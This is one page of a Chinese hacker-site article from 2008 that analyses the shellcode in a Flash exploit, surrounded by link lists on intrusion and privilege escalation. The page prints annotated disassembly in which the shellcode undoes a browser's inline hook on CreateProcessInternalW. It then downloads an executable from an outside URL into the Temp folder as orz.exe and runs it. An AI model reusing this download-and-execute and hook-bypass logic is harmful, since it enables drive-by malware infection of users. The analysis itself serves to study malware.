·	没有路由密码权限时的鸽	08-23	·	上网安全 Vista自我防范	10-11
·	让濒临崩溃的Windows XP	10-11	·	有备无患，快速自制救急	10-11
·	要你好看!Windows看图工	10-11	·	空间赞助网提供不同类型	10-11
·	讨论net.exe和net1.exe的	10-10	·	让3389远程桌面传输更通	10-10
·	巧妙入侵渗透赌博站	10-10	·	Aspx空间扫权限工具	10-10
·	Windows2003最新提权工具	10-10	·	易淘乐提供100M免费全能	10-10
·	系统开机密码忘了不着急	10-09	·	中意网络提供免费100M免	10-09
·	与众不同 Windows XP开始	10-08	·	让桌面图标翻跟斗在XP上	10-08
·	上海宽元站长资助计划-提	10-08	·	个性化Windows XP的任务	10-07
·	趣盘提供3G免费网络硬盘	10-07	·	秀山热线提供200MB免费全	10-07
·	一次艰辛的提权过程	10-06	·	成功入侵IT大卖场的渗透	10-06
·	mysqlhack- MYSQL利用工	10-06	·	lanker一句话PHP后门客户	10-06
·	WIXI提供3G免费多媒体网	10-06	·	新人网络提供100M/ftp免	10-06
·	如何利用QQ带来高流量	10-05	·	UuShare提供免费网络文件	10-05

[推荐]flash漏洞所用shellcode的分析

荐 ★★★★★

flash漏洞所用shellcode的分析

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-6-4 16:25:02

接下来的动作进一步证实了这一点，对CreateProcessInternalW开头的代码进行还原，这岂不是又正针对MAXTHON2对CreateProcessInternalW的inlline hook？！

00407102    8B7E 18         mov edi, dword ptr [esi+18]                          ; CreateProcessInternalW
00407105    E8 EF000000     call 004071F9
0040710A    68 68080A00     push 0A0868
0040710F    68 68080A00     push 0A0868
00407114    68 558BEC6A     push 6AEC8B55
00407119    8B049C          mov eax, dword ptr [esp+ebx*4]
0040711C    AB              stos dword ptr es:[edi]                               ; 还原前面的几个字节，还原inline hook
0040711D    33C0            xor eax, eax
0040711F    50              push eax
00407120    50              push eax
00407121    6A FF           push -1
00407123    8B049C          mov eax, dword ptr [esp+ebx*4]
00407126    AA              stos byte ptr es:[edi]

做完了这些操作，shellcode最后终于进入自己的实质性工作了。

首先，得到Temp文件夹地址，并在后面加入“orz.exe”，作为病毒文件的本地地址

00407127    8DBE 33010000   lea edi, dword ptr [esi+133]
0040712D    57              push edi
0040712E    68 FF000000     push 0FF
00407133    FF56 04         call dword ptr [esi+4]                                ; GetTempPathA
00407136    03C7            add eax, edi
00407138    C700 6F727A2E   mov dword ptr [eax], 2E7A726F                        ; 往得到的temp文件夹路径后面加入文件名
0040713E    C740 04 6578650>mov dword ptr [eax+4], 657865                        ; 加入的文件名为”orz.exe”

为保险，先尝试把这个路径的文件删除。

00407145 57 push edi
00407146 FF56 08 call dword ptr [esi+8] ; DeleteFileA

然后直接调用URLDownloadToFileA，从远程地址http://www.0×4f.cn/test.exe下载病毒文件到orz.exe

00407149    33DB            xor ebx, ebx
0040714B    53              push ebx
0040714C    53              push ebx
0040714D    57              push edi
0040714E    8D46 34         lea eax, dword ptr [esi+34]                          ; URL地址，”http://www.0×4f.cn/test.exe”
00407151    50              push eax
00407152    53              push ebx
00407153    FF56 2C         call dword ptr [esi+2C]                               ; URLDownloadToFileA

最后，shellcode执行所下载的文件，注意它使用了CreateProcessInternalA来进行。由于前面已经清除了对 CreateProcessInternalW和ZwCreateProcessEx以及ZwWriterVirtualMemory的保护，病毒作者坚信此时使用CreateProcessInternalA有非常大的可能可以成功。

00407156    33C0            xor eax, eax
00407158    8BFC            mov edi, esp
0040715A    6A 12           push 12
0040715C    59              pop ecx
0040715D    AB              stos dword ptr es:[edi]
0040715E  ^ E2 FD           loopd   short 0040715D                                   ; 循环，在堆栈中清出一块全0的空间
00407160    66:C74424 3C 01>mov word ptr [esp+3C], 101
00407167    8BFC            mov edi, esp
00407169    8D47 10         lea eax, dword ptr [edi+10]
0040716C    51              push ecx
0040716D    57              push edi
0040716E    50              push eax
0040716F    51              push ecx
00407170    51              push ecx
00407171    51              push ecx
00407172    51              push ecx
00407173    51              push ecx
00407174    51              push ecx
00407175    51              push ecx
00407176    8D96 33010000   lea edx, dword ptr [esi+133]                         ; 本地地址orz.exe
0040717C    52              push edx
0040717D    51              push ecx
0040717E    FF56 0C         call dword ptr [esi+C]                                ; CreateProcessInternalA
00407181    81C4 54020000   add esp, 254
00407187    61              popad
00407188    FF71 EC         push dword ptr [ecx-14]                               ; 这里应该会跳回原来溢出的位置，让程序正常运行下去
0040718B    C2 0400         retn 4

上一页 [1] [2] [3] [4] [5] [6] [7] 下一页

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章：利用IAT hook实现windows通用密码后门

下一篇文章： MySQL Proxy（解决注入的另一思路）

【字体：小大】

中介交易区

新云CMS Online.asp页面过滤不严	02-26
对网软网上购物系统的漏洞分析	01-09
测试SQL防注入脚本	12-21
Google Xss又出跨站新漏洞	11-06
一次简单的html injection导致的	11-06
风讯、科讯漏洞利用	11-01
Adobe pdf reader URI利用方式浅	10-23
超星阅览器的最新0DAY	10-19
运用SQL Injection做数据库渗透的	09-22
sa-blog 0day	09-22
HTML注入的一些简单想法	09-10
网站登陆接口的攻与防	09-04